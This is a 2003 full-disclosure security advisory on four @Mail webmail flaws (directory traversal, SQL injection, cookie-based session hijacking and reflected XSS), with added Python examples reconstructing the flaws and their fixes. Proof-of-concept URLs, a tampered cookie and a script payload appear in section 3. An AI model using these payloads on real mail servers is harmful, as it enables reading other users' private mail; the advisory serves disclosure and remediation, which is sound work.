Message-ID: <3FD5B0C5.5060800@s-quadra.com>
Date: Tue, 09 Dec 2003 14:23:49 +0300
From: S-Quadra Security Research <research@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
   bugtraq <bugtraq@...urityfocus.com>
Subject: @Mail web interface multiple security vulnerabilities


               S-Quadra Advisory #2003-12-09

Topic: @Mail web interface multiple security vulnerabilities
Severity: Average
Vendor URL: http://www.atmail.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031209.txt
Release date: 09 Dec 2003


1. DESCRIPTION

"@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)." -
www.atmail.com site says.

2. DETAILS

Multiple security vulnerabilities have been found in the @Mail web
interface which could allow a remote attacker, in the worst case, to gain
access to a user's mailbox.

@Mail allows two different types of installation:

a) Flat file install

All profiles and messages of @Mail users are stored in files.
This storage method is recommended for user bases of fewer than 10,000 users.

b) SQL database install (MySQL)

User profiles and messages are stored in a SQL database.

-- Vulnerability 1: Flat file install - Input validation error

'showmail.pl' fails to validate the 'Folder' request parameter, which allows
an attacker to point it at the mailbox of any registered user in the @Mail
system.

-- Vulnerability 2: SQL database install - Multiple SQL injection
vulnerabilities

Multiple SQL injection vulnerabilities have been found in the @Mail web
interface. User-supplied input is not filtered before being used in a
SQL query. Consequently, query modification is possible. Successful
exploitation could allow a remote attacker to read any email message of
any email address registered in the @Mail system.

Affected scripts - 'atmail.pl', 'search.pl', 'reademail.pl'.

-- Vulnerability 3: SQL database install - Session hijacking vulnerability

When a user logs into @Mail through the web interface, his session ID and
mailbox name are saved in a cookie. Modifying the mailbox name allows
an attacker to gain access to the victim's mailbox.
The victim's session ID must be active for this attack to be successful.

-- Vulnerability 4: All types of install - Cross Site Scripting
vulnerability in 'showmail.pl'

By injecting specially crafted JavaScript code into a URL and tricking a
user into visiting it, a remote attacker can steal the session ID and gain
access to the victim's mailbox.

3. PoC Code

-- Vulnerability 1

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

The following URL will give access to victim@...ehost.com's mailbox:

-http://www.site.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

-- Vulnerability 2

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

- through the SQL injection vulnerability in 'search.pl' an attacker can
find the message ID of any message of any registered user
- the following URL opens the message with message ID '666' for user
'victim@...ail.com':

-http://www.site.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1
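To show what the payload above does to the query, here is an added example
that is not @Mail's code (the product's scripts are Perl; this is Python with
an in-memory SQLite table written for this page). The schema, the column
names other than 'Account', the order of the WHERE conditions and the sample
rows are all assumptions; the reconstruction is chosen so that the attacker's
own session, with 'folder' injected as in the PoC, ends up selecting the
victim's message 666 because SQL's AND binds tighter than OR. The
parameterised variant beside it is the fix.

```python
import sqlite3

# Constructed sample rows for a hypothetical message table. Only the table
# name 'EmailDatabase_v' and the column 'Account' come from the advisory's
# PoC URL; 'id', 'folder' and 'subject' are assumed.
SAMPLE_ROWS = [
    (1,   "hacker@somehost.com", "Inbox", "welcome"),
    (666, "victim@atmail.com",   "Inbox", "password reset"),
    (667, "victim@atmail.com",   "Sent",  "re: invoice"),
]

# The 'folder' value from the advisory's PoC URL, URL-decoded.
POC_FOLDER = "qwer' or EmailDatabase_v.Account='victim@atmail.com"


def build_db():
    """Create the constructed table in memory and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE EmailDatabase_v "
        "(id INTEGER, Account TEXT, folder TEXT, subject TEXT)"
    )
    conn.executemany("INSERT INTO EmailDatabase_v VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def read_email_vulnerable(conn, account, msg_id, folder):
    """Assumed shape of the flawed query: request parameters are pasted into
    the SQL text. 'account' is the logged-in user (from the session);
    'msg_id' and 'folder' come straight from the URL. With POC_FOLDER the
    WHERE clause parses as
      (Account='hacker' AND folder='qwer') OR (Account='victim' AND id=666)
    so the attacker's request returns the victim's message."""
    sql = (
        "SELECT id, Account, subject FROM EmailDatabase_v "
        "WHERE EmailDatabase_v.Account='" + account + "' "
        "AND folder='" + folder + "' "
        "AND id=" + str(int(msg_id))
    )
    return conn.execute(sql).fetchall()


def read_email_safe(conn, account, msg_id, folder):
    """Same query with bound parameters: the quote inside 'folder' is data,
    not SQL, so the injected OR never reaches the parser."""
    sql = (
        "SELECT id, Account, subject FROM EmailDatabase_v "
        "WHERE EmailDatabase_v.Account=? AND folder=? AND id=?"
    )
    return conn.execute(sql, (account, folder, int(msg_id))).fetchall()


if __name__ == "__main__":
    db = build_db()
    me = "hacker@somehost.com"
    print("vulnerable:", read_email_vulnerable(db, me, 666, POC_FOLDER))
    print("safe:      ", read_email_safe(db, me, 666, POC_FOLDER))
```

The same bound-parameter change applies to 'atmail.pl' and 'search.pl';
escaping quotes by hand is the usual half-fix and still breaks on the next
untreated parameter.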

-- Vulnerability 3

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

1. The attacker logs into the @Mail web interface.
2. The attacker changes the mailbox name in the cookie to the victim's mailbox name:

Account&hacker%40somehost.com&SessionID&1064305709fzvpjackee =>
Account&victim%40somehost.com&SessionID&1064305709fzvpjackee

3. The attacker opens the web interface of the victim's mailbox by visiting the
following URL:
   - http://www.site.com/parse.pl?file=html/english/xp/xplogin.html
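The cookie layout in step 2 (name/value pairs joined with '&', values
URL-encoded) is enough to show why the hijack works and what the server
should do instead. The following is an added Python example written for this
page, not @Mail's Perl code; the server-side session table, the helper names
and the premise that the server records which account a session ID belongs to
are assumptions.

```python
from urllib.parse import unquote

# Constructed server-side session table: session ID -> account that
# authenticated. The ID is the one from the advisory's cookie.
SESSIONS = {"1064305709fzvpjackee": "hacker@somehost.com"}

# Cookie values from the advisory: the attacker's own, and the tampered copy.
ORIGINAL_COOKIE = "Account&hacker%40somehost.com&SessionID&1064305709fzvpjackee"
TAMPERED_COOKIE = "Account&victim%40somehost.com&SessionID&1064305709fzvpjackee"


def parse_atmail_cookie(raw):
    """Split 'k1&v1&k2&v2...' into a dict, URL-decoding the values."""
    parts = raw.split("&")
    if len(parts) % 2 != 0:
        raise ValueError("malformed cookie: odd number of fields")
    return {parts[i]: unquote(parts[i + 1]) for i in range(0, len(parts), 2)}


def resolve_mailbox_vulnerable(raw_cookie, sessions=SESSIONS):
    """Assumed flawed logic: check that the session ID is live, then trust
    the Account field the client sent. Any live session opens any mailbox."""
    c = parse_atmail_cookie(raw_cookie)
    if c.get("SessionID") not in sessions:
        return None
    return c.get("Account")


def resolve_mailbox_fixed(raw_cookie, sessions=SESSIONS):
    """The account comes from the server-side session record; the cookie's
    Account field is at most a consistency check, never an authority."""
    c = parse_atmail_cookie(raw_cookie)
    bound = sessions.get(c.get("SessionID"))
    if bound is None:
        return None          # unknown or expired session: not logged in
    if c.get("Account") != bound:
        return None          # cookie tampered: treat as logged out
    return bound


if __name__ == "__main__":
    print("vulnerable:", resolve_mailbox_vulnerable(TAMPERED_COOKIE))
    print("fixed:     ", resolve_mailbox_fixed(TAMPERED_COOKIE))
```

Binding the account to the session on the server closes this hole but not
the next one: a session ID stolen through the XSS in vulnerability 4 still
resolves to the victim for as long as the session is live, which is why the
advisory notes that the victim's session must be active.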

-- Vulnerability 4

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

http://www.site.com/showmail.pl?Folder=<script>alert(document.cookie)</script>
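Both issues in 'showmail.pl' (vulnerability 1, traversal through 'Folder',
and vulnerability 4, 'Folder' reflected unescaped) come from the same
unvalidated parameter, so one added example covers both. It is Python written
for this page, not @Mail's Perl; the on-disk layout
MAIL_ROOT/<account>/mbox/<folder> is inferred from the shape of the PoC path,
and the allow-list pattern, the error page and the function names are
assumptions.

```python
import html
import posixpath
import re

# Assumed layout, modelled on the path shape in the PoC URL
# ('../../victim@somehost.com/mbox/Inbox'): MAIL_ROOT/<account>/mbox/<folder>.
MAIL_ROOT = "/var/atmail/users"

# Folder names a user may legitimately request: a short token with no
# separators and no leading dot. This alone rejects '../', an absolute path
# and the <script> payload, because none of them match.
FOLDER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def folder_path(account, folder):
    """Return the absolute path for the user's folder, or None if rejected."""
    if not isinstance(folder, str) or not FOLDER_RE.match(folder):
        return None
    user_root = posixpath.join(MAIL_ROOT, account, "mbox")
    candidate = posixpath.normpath(posixpath.join(user_root, folder))
    # Defence in depth: after normalisation the result must still sit below
    # this user's own mbox directory. (On the Windows build the advisory
    # tested, '\\' is also a separator; the allow-list above excludes it.)
    if not candidate.startswith(user_root + "/"):
        return None
    return candidate


def render_folder_error(folder):
    """Reflect the rejected value only after HTML-escaping it (vulnerability 4)."""
    return "<p>Folder %s not found</p>" % html.escape(folder, quote=True)


def show_mail(account, folder):
    """Stand-in for the showmail.pl entry point; returns (HTTP status, body)."""
    path = folder_path(account, folder)
    if path is None:
        return 400, render_folder_error(folder)
    return 200, path  # a real handler would open and render this mailbox file


if __name__ == "__main__":
    me = "hacker@somehost.com"
    print(show_mail(me, "Inbox"))
    print(show_mail(me, "../../victim@somehost.com/mbox/Inbox"))
    print(show_mail(me, "<script>alert(document.cookie)</script>"))
```

The account passed to show_mail must come from the server-side session, not
from the cookie's Account field, or the confinement check confines the wrong
user.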

4. FIX INFORMATION

S-Quadra alerted @Mail's development team to these issues on 02 Dec
2003. No response has been received. No fix is available.

5. CREDITS

Nick Gudov <cipher@...uadra.com> is responsible for discovering
these issues.

6. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assessment, web application security, source code review and
third-party product vulnerability assessment, forensic support and
reverse engineering.

Security is an art and our goal is to bring responsible and high quality
security service to the IT market, customized to meet the unique needs
of each individual client.

S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.

          S-Quadra Advisory #2003-12-09



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

